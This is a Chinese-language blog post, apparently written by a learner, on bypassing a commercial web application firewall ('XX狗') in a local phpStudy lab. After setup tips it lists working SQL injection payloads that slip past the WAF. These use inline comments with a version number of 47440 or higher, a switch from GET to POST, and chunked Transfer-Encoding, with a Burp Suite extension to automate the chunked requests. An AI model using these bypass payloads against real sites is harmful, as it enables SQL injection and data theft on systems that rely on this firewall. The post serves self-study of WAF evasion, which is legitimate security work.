【WAF绕过】绕过XX狗

XX狗

萌新学习之路上必绕的XX狗

搭建过程

搭建过程比较简单,但存在一些小问题

具体说一下我所遇到的

在安装过程中会自动弹出一个配置菜单,需要输入网站信息。一般来讲这些信息会自动获取,但是我所使用的phpstudy2018版即使安装apache但在服务中也无法找到正确服务名。

【WAF绕过】绕过XX狗_第1张图片

解决方法:

需要将phpstudy配置成为系统服务

【WAF绕过】绕过XX狗_第2张图片

安装并开启apache服务

【WAF绕过】绕过XX狗_第3张图片

如果在服务还是没有找到apache的服务话,就需要进入apache的bin目录下安装服务

phpStudy\PHPTutorial\Apache\bin

执行系统命令

httpd.exe -k install -n apache2.4

再次安装即可成功

若需要删除多余的服务执行命令

sc delete apache2.4

绕过XX狗

先确认XX狗保护生效,利用payload成功触发WAF

payload:

?id=0' union select 1,2,3--+

【WAF绕过】绕过XX狗_第4张图片

数字绕过

使用内联注释尝试绕过,发现依然会触发防护

【WAF绕过】绕过XX狗_第5张图片

绕过XX狗有一个重要数字47440,当大于等于47440的数字与内联注释一同使用时就可以达到绕过XX狗的效果,在网站XX狗4.0依然有效

payload:

?id=0' union /*!47440select*/ 1,2,3--+

【WAF绕过】绕过XX狗_第6张图片

更换请求方法

使用GET方法会触发WAF

?a=0+union+select+1;

【WAF绕过】绕过XX狗_第7张图片

?a=0%20union%20/*!37440select*/database()--+

【WAF绕过】绕过XX狗_第8张图片

在BP中更换请求方法为POST,就不会触发WAF

【WAF绕过】绕过XX狗_第9张图片
【WAF绕过】绕过XX狗_第10张图片

XX狗在POST包中会禁止select database()–+


单纯使用pipeline在POST中携带GET脏数据请求,被WAF拦截

【WAF绕过】绕过XX狗_第11张图片

pipeline在POST中携带POST脏数据请求,可以绕过,但应该是POST数据的原因

【WAF绕过】绕过XX狗_第12张图片

也就说使用pipeline的方法无法绕过

分块传输

分块传输需要在http头中添加Transfer-Encoding: chunked

注意要在数据后面添加几个空格,否则会导致无法得到回包
【WAF绕过】绕过XX狗_第13张图片

协议未覆盖(失败)

以下四种常见的content-type类型,我们可以尝试互相替换尝试绕过WAF过滤机制。
注:如图常见的绕过方式为使用multipart/form-data标签,并把name设为参数名内容写入注入语句。

Content-Type: text/html; charset=UTF-8
Content-Type: application/json; charset=utf-8
Content-Type: application/x-www- form-urlencoded;charset=utf-8
Content-Type: multipart/form-data; boundary=something

尝试使用content-type绕过,但失败
【WAF绕过】绕过XX狗_第14张图片


BP分块传输模块

在BP的Extension中添加下载并编译好的模块jar

【WAF绕过】绕过XX狗_第15张图片

安装好jar包后,就能在右键找到分块传输编码的选项
【WAF绕过】绕过XX狗_第16张图片
点击Encoding选项就能轻松利用分块传输绕过WAF

你可能感兴趣的:(WAF绕过)